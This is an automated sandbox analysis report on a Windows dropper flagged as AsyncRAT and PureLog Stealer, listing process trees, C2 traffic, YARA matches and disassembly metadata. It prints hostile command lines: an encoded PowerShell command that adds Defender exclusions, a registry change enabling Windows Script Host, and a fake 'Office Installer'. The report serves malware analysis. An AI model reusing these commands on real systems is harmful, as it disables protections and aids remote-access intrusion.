Apr 29, 2024 10:23:48.219836950 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:48.470474958 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:48.470552921 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:48.720514059 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:58.245479107 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:58.501786947 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:58.501878977 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:58.712738991 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:58.756894112 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:58.966964960 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:58.968919992 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:59.220457077 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:59.220583916 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:59.470508099 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:24:02.533536911 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:24:02.587805033 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:24:02.797964096 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:24:02.843863010 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:24:08.815105915 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:24:09.080583096 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:24:09.080645084 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:24:09.293154001 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:24:09.340820074 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:24:09.550962925 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:24:09.595833063 CEST	49731	7707	192.168.2.4	95.211.208.153

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 29, 2024 10:22:16.670823097 CEST	1.1.1.1	192.168.2.4	0xe844	No error (0)	windowsupdatebg.s.llnwi.net		208.111.186.128	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	10:21:55
Start date:	29/04/2024
Path:	C:\Users\user\Desktop\Gm602axA2d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Gm602axA2d.exe"
Imagebase:	0x400000
File size:	19'303'424 bytes
MD5 hash:	2D25CA067A272BD8542CABE1FF9985D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000000.00000002.1681159516.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:21:56
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcwBqACMAPgA="
Imagebase:	0xe40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:21:56
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:21:56
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Local\Vulvvmkewji.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Vulvvmkewji.exe"
Imagebase:	0x6c0000
File size:	8'936'960 bytes
MD5 hash:	55B293F5BC4F0A9CA106B3ADC2AF7F79
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1818612437.0000000007381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1722917882.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1818612437.0000000007169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1729748988.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000003.00000002.1722917882.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1818612437.0000000006501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2070694207.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2011791495.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1729748988.0000000004C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs Detection: 64%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:21:57
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Local\Temp\Office Installer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Office Installer.exe"
Imagebase:	0x7ff6c7e70000
File size:	10'075'648 bytes
MD5 hash:	6B9D8041B99E48CAAF20261DFBCB787F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000004.00000002.2915851514.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000004.00000000.1671786715.00007FF6C80E9000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\Office Installer.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs Detection: 50%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	10:22:00
Start date:	29/04/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	"reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings" /v "Enabled" /t REG_DWORD /d 1 /f
Imagebase:	0x7ff7d1770000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:22:00
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:22:01
Start date:	29/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:22:03
Start date:	29/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -nop -command "& { (New-Object Net.WebClient).DownloadFile('https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v2/C2RReleaseData', 'C:\Users\user\AppData\Local\Temp\files\ver.txt') }"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:22:03
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:22:04
Start date:	29/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Imagebase:	0xe70000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2944600925.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2920632986.00000000068F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2944600925.0000000008ED8000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	10:22:19
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Roaming\Lxfrfbi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Lxfrfbi.exe"
Imagebase:	0x340000
File size:	8'936'960 bytes
MD5 hash:	55B293F5BC4F0A9CA106B3ADC2AF7F79
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2181412356.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000C.00000002.1931713295.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2181412356.0000000006E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2114944613.0000000004EF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2181412356.0000000006F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.1931713295.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs Detection: 64%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:22:24
Start date:	29/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Imagebase:	0xe70000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000002.2012368541.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.2133699444.0000000009596000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.2027914076.00000000070E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:22:28
Start date:	29/04/2024
Path:	C:\Users\user\AppData\Roaming\Lxfrfbi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Lxfrfbi.exe"
Imagebase:	0xb70000
File size:	8'936'960 bytes
MD5 hash:	55B293F5BC4F0A9CA106B3ADC2AF7F79
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2248433326.0000000007751000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2214020576.0000000005784000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2248433326.0000000007701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2248433326.00000000077F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2101694396.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000010.00000002.2101694396.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:22:35
Start date:	29/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Imagebase:	0xe70000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000002.2103131027.0000000005465000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000002.2121649452.000000000703C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	80.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.1%
Total number of Nodes:	28
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004014EB
SetUnhandledExceptionFilter.KERNEL32(004014AF), ref: 004014F9
__set_app_type.MSVCRT ref: 00401504
_controlfp.MSVCRT ref: 00401518
__getmainargs.MSVCRT ref: 00401546
exit.MSVCRT ref: 00401578

Memory Dump Source

Source File: 00000000.00000002.1675308686.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1675296466.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1675323832.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1675323832.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001625000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001627000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001665000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Gm602axA2d.jbxd

Similarity

API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 3649950142-0
Opcode ID: d755e37862de92692ca498495cd4b5fe1c7ce7f0f96246ddacece006876c940f
Instruction ID: e1f631c93b76a6904ceaad0ff465b9cf3f9d319a7cdbae4e6468e1b423ed3b85
Opcode Fuzzy Hash: d755e37862de92692ca498495cd4b5fe1c7ce7f0f96246ddacece006876c940f
Instruction Fuzzy Hash: A0115EF5E01104ABCB20EFA8EC85F9A73ACAB0D304F040476F805E3365E63DE9588B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040108C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 239
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

ShellExecuteA.SHELL32(?,?,?,00000000), ref: 004010F3
memset.MSVCRT ref: 00401108
memset.MSVCRT ref: 00401150
strcmp.MSVCRT ref: 004011E2
strcpy.MSVCRT(?,00000000), ref: 00401230
getenv.MSVCRT ref: 0040126D
sprintf.MSVCRT ref: 004012BF
fopen.MSVCRT ref: 004012D4
fwrite.MSVCRT ref: 00401339
fclose.MSVCRT ref: 00401348
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 004013A0

Strings

! @, xrefs: 0040109C
`!@, xrefs: 00401110
%s\%s, xrefs: 004012B2, 004012B7
1 @, xrefs: 004010C7
}!@, xrefs: 00401120
& @, xrefs: 004010B0
m!@, xrefs: 00401118

Memory Dump Source

Source File: 00000000.00000002.1675308686.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1675296466.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1675323832.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1675323832.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001625000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001627000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001665000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Gm602axA2d.jbxd

Similarity

API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: ! @$%s\%s$& @$1 @$`!@$m!@$}!@
API String ID: 3236948872-2624156337
Opcode ID: ad2e3edb425e912b23fda3f3d7899049c49466d5b3a96cfb3e50ae83933f1f6b
Instruction ID: b78f4d8275842714cc5fd9faa59cd46e629838f8154e9c98a36ef837a3c13b30
Opcode Fuzzy Hash: ad2e3edb425e912b23fda3f3d7899049c49466d5b3a96cfb3e50ae83933f1f6b
Instruction Fuzzy Hash: 7B811EF1E001149BDB14DBACDC45B9E77B9EB48309F04057AF509FB392E63CAA448B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

]1b41sc8y+c2ai^adpb022l!8-9bphws, xrefs: 0040106E

Memory Dump Source

Source File: 00000000.00000002.1675308686.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1675296466.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1675323832.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1675323832.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001625000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001627000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001665000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Gm602axA2d.jbxd

Similarity

API ID: malloc
String ID: ]1b41sc8y+c2ai^adpb022l!8-9bphws
API String ID: 2803490479-2145275822
Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

Uniqueness

Uniqueness Score: -1.00%

Function 0040145B Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1675308686.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1675296466.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1675323832.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1675323832.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001625000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001627000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1676747046.0000000001665000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Gm602axA2d.jbxd

Similarity

API ID: memset$ExecuteShellstrcmp
String ID:
API String ID: 1389483452-0
Opcode ID: dbaab5fe790729e04005ebd0197902161935ec43755d7de1c2bf7d8a6dd1ab1f
Instruction ID: a735455d5637598fa1efb2a70fc575555a1c3689b29116ef864235026e8f052e
Opcode Fuzzy Hash: dbaab5fe790729e04005ebd0197902161935ec43755d7de1c2bf7d8a6dd1ab1f
Instruction Fuzzy Hash: D1F0F8B5A01248AFCB50DFA8D881E9A77F8BB4D308F004066F948D7354E638EA588B54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 2004, Parent PID: 7136COMMON

Executed Functions

Function 0520B568 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1768984058.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5200000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d18bfaeea1a178ab1b36efd49185668b1801a72f63fa4deb0a5445971c9769
Instruction ID: 6b62128b961233076af71714a5accfc137eb4de3ea437c92cb3c42e2c30f30f1
Opcode Fuzzy Hash: 08d18bfaeea1a178ab1b36efd49185668b1801a72f63fa4deb0a5445971c9769
Instruction Fuzzy Hash: EB918FB5B007159FDB19EFB488149AEB7F2EF84604B40892DD14AAF380DF745D0A8BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0520B578 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1768984058.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5200000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f1923771fa34510e6926c1642825d315dc3223f5e3327add2397ce3a41bee4
Instruction ID: 317b872655b3c017d07f127f4401e3a73740c05727b554bd79c0550b01521126
Opcode Fuzzy Hash: 40f1923771fa34510e6926c1642825d315dc3223f5e3327add2397ce3a41bee4
Instruction Fuzzy Hash: EC919FB5B007149FDB19EFB4C8149AEB6F2EF84600B40892DD10AAF380DF745D0A8BD6

Uniqueness

Uniqueness Score: -1.00%

Function 07D32308 Relevance: 21.9, Strings: 17, Instructions: 640COMMON

Download Yara Rule

Strings

JZl, xrefs: 07D3237F
pi!k, xrefs: 07D323A0
pi!k, xrefs: 07D323B0
|,#k, xrefs: 07D325DB
JZl, xrefs: 07D3259E
pi!k, xrefs: 07D32416
4'^q, xrefs: 07D32619
rYl, xrefs: 07D32559
_, xrefs: 07D3246F
rYl, xrefs: 07D3254F
JZl, xrefs: 07D325EA
JZl, xrefs: 07D323C5
JZl, xrefs: 07D325F6
JZl, xrefs: 07D323D1
pi!k, xrefs: 07D32363
pi!k, xrefs: 07D32582
4'^q, xrefs: 07D3260D

Memory Dump Source

Source File: 00000001.00000002.2046901703.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$_$pi!k$pi!k$pi!k$pi!k$pi!k$|,#k$JZl$JZl$JZl$JZl$JZl$JZl$rYl$rYl
API String ID: 0-2361037708
Opcode ID: cc6cec10bff9513ff5435f0ad020659802b85ade1e237f970a2b362ef44d6c03
Instruction ID: 9038c0375225e39901cb96084635aef65bee2ee5bf9b347fe628acfa0a3b5bf4
Opcode Fuzzy Hash: cc6cec10bff9513ff5435f0ad020659802b85ade1e237f970a2b362ef44d6c03
